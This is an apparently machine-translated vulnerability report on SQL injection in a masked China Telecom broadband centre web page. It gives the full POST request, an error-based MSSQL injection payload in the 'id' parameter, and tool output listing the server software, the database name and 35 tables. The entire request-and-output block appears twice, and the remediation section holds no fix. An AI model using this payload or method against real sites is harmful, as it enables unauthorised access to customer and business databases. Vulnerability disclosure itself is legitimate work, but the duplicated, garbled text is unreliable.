SQL Injection exists in China Telecom's Telecom broadband center in a city
RT
Http: // **. **/liucheng. asp
Search box post injection
POST/liucheng. asp? Login = yes HTTP/1.1
Host :**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 42.0) Gecko/20100101 Firefox/42.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: zh-CN, zh; q = 0.8, en-US; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Referer: http: // **. **/liucheng. asp
Cookie: bd1__firstime = 1417062486406; % C9 % EE % DB % DA % B5 % E7 % D0 % C5 % BF % ED % B4 % F8 % D3 % C5 % BB % DD % D7 % A8 % C7 % F8 = Skin =; aspsessionidasacct = Shanghai; Shanghai = 1449050799; Shanghai = 1449050799; CNZZDATA1238722 = cnzz_eid % Shanghai-% 26 ntime % 3D1449050818; Shanghai = 1; QIAO_COOKIE_INVITE_PAGE = 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Idtpye = % B6 % A9 % B5 % A5 % B1 % E0 % BA % C5 & id = 123 & Submit = % B5 % C7 % C2 % BC % B2 % E9 % D1 % AF
Parameter id Injection
---
Parameter: #1 * (custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING clause
Payload: idtpye = % B6 % A9 % B5 % A5 % B1 % E0 % BA % C5 & id = 123 '+ (SELECT 'pkdd' WHERE 4030 = 4030 AND 1577 = CONVERT (INT, (select char (113) + CHAR (107) + CHAR (118) + CHAR (106) + CHAR (113) + (SELECT (case when (1577 = 1577) then char (49) else char (48) END) + CHAR (113) + CHAR (120) + CHAR (106) + CHAR (107) + CHAR (113) + '& Submit = % B5 % C7 % C2 % BC % B2 % E9 % D1 % AF
---
Web server operating system: Windows 2003 or XP
Web application technology: ASP. NET, Microsoft IIS 6.0, ASP
Back-end DBMS: Microsoft SQL Server 2008
Database: hds0270595_db
[35 tables]
+ -------------------------------------------- +
| Bankmx |
| Caidan |
| Caigou |
| Cdma |
| Chanpin |
| Config |
| Dingdan |
| Dkjl |
| Dls |
| Dxtaocan |
| Dxwap |
| Dxwapchanping |
| Dxyonghu |
| Mingxi |
| Modem |
| Quyu |
| Qydingdan |
| Rizi |
| Taocan |
| Telbook |
| Tvdingdan |
| Tvdz |
| Tvtaocan |
| Tvwap |
| Tvwapchanping |
| Tvyonghu |
| Wcdma |
| Xsdingdan |
| Xydingdan |
| Yuangong |
| Ywqx |
| Yybb |
| Zhangbu |
| Zhdingdan |
| Zu_yuangong |
+ -------------------------------------------- +
Http: // **. **/liucheng. asp
Search box post injection
POST/liucheng. asp? Login = yes HTTP/1.1
Host :**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 42.0) Gecko/20100101 Firefox/42.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: zh-CN, zh; q = 0.8, en-US; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Referer: http: // **. **/liucheng. asp
Cookie: bd1__firstime = 1417062486406; % C9 % EE % DB % DA % B5 % E7 % D0 % C5 % BF % ED % B4 % F8 % D3 % C5 % BB % DD % D7 % A8 % C7 % F8 = Skin =; aspsessionidasacct = Shanghai; Shanghai = 1449050799; Shanghai = 1449050799; CNZZDATA1238722 = cnzz_eid % Shanghai-% 26 ntime % 3D1449050818; Shanghai = 1; QIAO_COOKIE_INVITE_PAGE = 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Idtpye = % B6 % A9 % B5 % A5 % B1 % E0 % BA % C5 & id = 123 & Submit = % B5 % C7 % C2 % BC % B2 % E9 % D1 % AF
Parameter id Injection
---
Parameter: #1 * (custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING clause
Payload: idtpye = % B6 % A9 % B5 % A5 % B1 % E0 % BA % C5 & id = 123 '+ (SELECT 'pkdd' WHERE 4030 = 4030 AND 1577 = CONVERT (INT, (select char (113) + CHAR (107) + CHAR (118) + CHAR (106) + CHAR (113) + (SELECT (case when (1577 = 1577) then char (49) else char (48) END) + CHAR (113) + CHAR (120) + CHAR (106) + CHAR (107) + CHAR (113) + '& Submit = % B5 % C7 % C2 % BC % B2 % E9 % D1 % AF
---
Web server operating system: Windows 2003 or XP
Web application technology: ASP. NET, Microsoft IIS 6.0, ASP
Back-end DBMS: Microsoft SQL Server 2008
Database: hds0270595_db
[35 tables]
+ -------------------------------------------- +
| Bankmx |
| Caidan |
| Caigou |
| Cdma |
| Chanpin |
| Config |
| Dingdan |
| Dkjl |
| Dls |
| Dxtaocan |
| Dxwap |
| Dxwapchanping |
| Dxyonghu |
| Mingxi |
| Modem |
| Quyu |
| Qydingdan |
| Rizi |
| Taocan |
| Telbook |
| Tvdingdan |
| Tvdz |
| Tvtaocan |
| Tvwap |
| Tvwapchanping |
| Tvyonghu |
| Wcdma |
| Xsdingdan |
| Xydingdan |
| Yuangong |
| Ywqx |
| Yybb |
| Zhangbu |
| Zhdingdan |
| Zu_yuangong |
+ -------------------------------------------- +
Solution:
You are more professional than me.